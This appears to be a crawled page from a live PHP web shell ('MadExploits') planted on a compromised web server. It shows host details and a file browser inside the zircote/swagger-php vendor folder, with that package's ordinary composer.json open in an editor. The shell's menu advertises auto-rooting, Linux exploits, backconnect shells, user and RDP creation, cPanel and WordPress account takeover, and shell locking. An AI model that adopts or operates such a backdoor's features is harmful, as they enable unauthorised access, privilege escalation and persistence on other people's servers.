Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.2
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
sms-auth /
vendor /
zircote /
swagger-php /
[ HOME SHELL ]
Name
Size
Permission
Action
.github
[ DIR ]
drwxrwxr-x
Examples
[ DIR ]
drwxrwxr-x
bin
[ DIR ]
drwxrwxr-x
docs
[ DIR ]
drwxrwxr-x
src
[ DIR ]
drwxrwxr-x
tests
[ DIR ]
drwxrwxr-x
.gitignore
156
B
-rw-rw-r--
.php-cs-fixer.dist.php
2.37
KB
-rw-rw-r--
Changelog.md
108
B
-rw-rw-r--
LICENSE-2.0.txt
11.09
KB
-rw-rw-r--
README.md
3.89
KB
-rw-rw-r--
composer.json
2.08
KB
-rw-rw-r--
phpunit.xml.dist
687
B
-rw-rw-r--
psalm.xml
444
B
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : composer.json
{ "name": "zircote/swagger-php", "type": "library", "license": "Apache-2.0", "bin": [ "bin/openapi" ], "description": "swagger-php - Generate interactive documentation for your RESTful API using phpdoc annotations", "keywords": [ "json", "rest", "api", "service discovery" ], "homepage": "https://github.com/zircote/swagger-php/", "authors": [ { "name": "Robert Allen", "email": "zircote@gmail.com" }, { "name": "Bob Fanger", "email": "bfanger@gmail.com", "homepage": "https://bfanger.nl" }, { "name": "Martin Rademacher", "email": "mano@radebatz.net", "homepage": "https://radebatz.net" } ], "config": { "bin-dir": "bin", "sort-packages": true }, "minimum-stability": "stable", "require": { "php": ">=7.2", "ext-json": "*", "doctrine/annotations": "^1.7", "symfony/finder": ">=2.2", "symfony/yaml": ">=3.3" }, "autoload": { "psr-4": { "OpenApi\\": "src" }, "files": [ "src/functions.php" ] }, "require-dev": { "friendsofphp/php-cs-fixer": "^2.17 || ^3.0", "phpunit/phpunit": ">=8" }, "autoload-dev": { "psr-4": { "OpenApi\\Tests\\": "tests/", "AnotherNamespace\\": "tests/Fixtures/AnotherNamespace" } }, "scripts": { "cs": "php-cs-fixer fix --allow-risky=yes", "lint": "@cs --dry-run", "test": [ "phpunit", "@lint" ], "phpstan": "phpstan analyze --level=3 src | grep -v 'does not accept default value of type string'", "psalm": "psalm", "analyse": [ "@phpstan", "@psalm" ], "validate-examples": { "spectral": "for ff in `find Examples -name *.yaml`; do spectral lint $ff; done", "swagger-cli": "for ff in `find Examples -name *.yaml`; do swagger-cli validate $ff; done" }, "docs": "./docs/node_modules/.bin/vuepress dev docs/", "deploy_docs": "./docs/node_modules/.bin/vuepress build docs/ && cp -r .git docs/.vuepress/dist/.git && cd docs/.vuepress/dist/ && git symbolic-ref HEAD refs/heads/gh-pages && git add --all" } }
Close